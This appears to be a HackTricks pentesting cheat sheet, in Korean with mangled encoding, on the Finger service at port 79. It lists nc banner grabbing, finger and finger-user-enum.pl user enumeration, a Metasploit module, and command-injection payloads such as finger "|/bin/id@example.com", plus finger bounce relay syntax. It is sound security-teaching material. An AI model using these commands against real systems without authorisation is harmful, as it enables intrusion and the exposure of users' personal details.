79 - Pentesting Finger

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

๊ธฐ๋ณธ ์ •๋ณด

Finger ํ”„๋กœ๊ทธ๋žจ/์„œ๋น„์Šค๋Š” ์ปดํ“จํ„ฐ ์‚ฌ์šฉ์ž์— ๋Œ€ํ•œ ์„ธ๋ถ€ ์ •๋ณด๋ฅผ ๊ฒ€์ƒ‰ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. ์ผ๋ฐ˜์ ์œผ๋กœ ์ œ๊ณต๋˜๋Š” ์ •๋ณด์—๋Š” ์‚ฌ์šฉ์ž์˜ ๋กœ๊ทธ์ธ ์ด๋ฆ„, ์ „์ฒด ์ด๋ฆ„์ด ํฌํ•จ๋˜๋ฉฐ, ๊ฒฝ์šฐ์— ๋”ฐ๋ผ ์ถ”๊ฐ€ ์„ธ๋ถ€ ์ •๋ณด๊ฐ€ ํฌํ•จ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์ถ”๊ฐ€ ์„ธ๋ถ€ ์ •๋ณด์—๋Š” ์‚ฌ๋ฌด์‹ค ์œ„์น˜ ๋ฐ ์ „ํ™”๋ฒˆํ˜ธ(๊ฐ€๋Šฅํ•œ ๊ฒฝ์šฐ), ์‚ฌ์šฉ์ž๊ฐ€ ๋กœ๊ทธ์ธํ•œ ์‹œ๊ฐ„, ๋น„ํ™œ์„ฑ ๊ธฐ๊ฐ„(์œ ํœด ์‹œ๊ฐ„), ์‚ฌ์šฉ์ž๊ฐ€ ๋งˆ์ง€๋ง‰์œผ๋กœ ์ฝ์€ ๋ฉ”์ผ์˜ ์‹œ๊ฐ„, ์‚ฌ์šฉ์ž์˜ ๊ณ„ํš ๋ฐ ํ”„๋กœ์ ํŠธ ํŒŒ์ผ์˜ ๋‚ด์šฉ์ด ํฌํ•จ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๊ธฐ๋ณธ ํฌํŠธ: 79

PORT   STATE SERVICE
79/tcp open  finger

์—ด๊ฑฐ

๋ฐฐ๋„ˆ ์ˆ˜์ง‘/๊ธฐ๋ณธ ์—ฐ๊ฒฐ

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

์‚ฌ์šฉ์ž ์—ด๊ฑฐ

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

๋Œ€์•ˆ์œผ๋กœ finger-user-enum์„ pentestmonkey์—์„œ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋ช‡ ๊ฐ€์ง€ ์˜ˆ:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap์€ ๊ธฐ๋ณธ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‹คํ–‰ํ•ฉ๋‹ˆ๋‹ค

Metasploit์€ Nmap๋ณด๋‹ค ๋” ๋งŽ์€ ํŠธ๋ฆญ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

๋ช…๋ น ์‹คํ–‰

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

์‹œ์Šคํ…œ์„ finger ๋ฆด๋ ˆ์ด๋กœ ์‚ฌ์šฉํ•˜๊ธฐ

finger user@host@victim
finger @internal@external

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ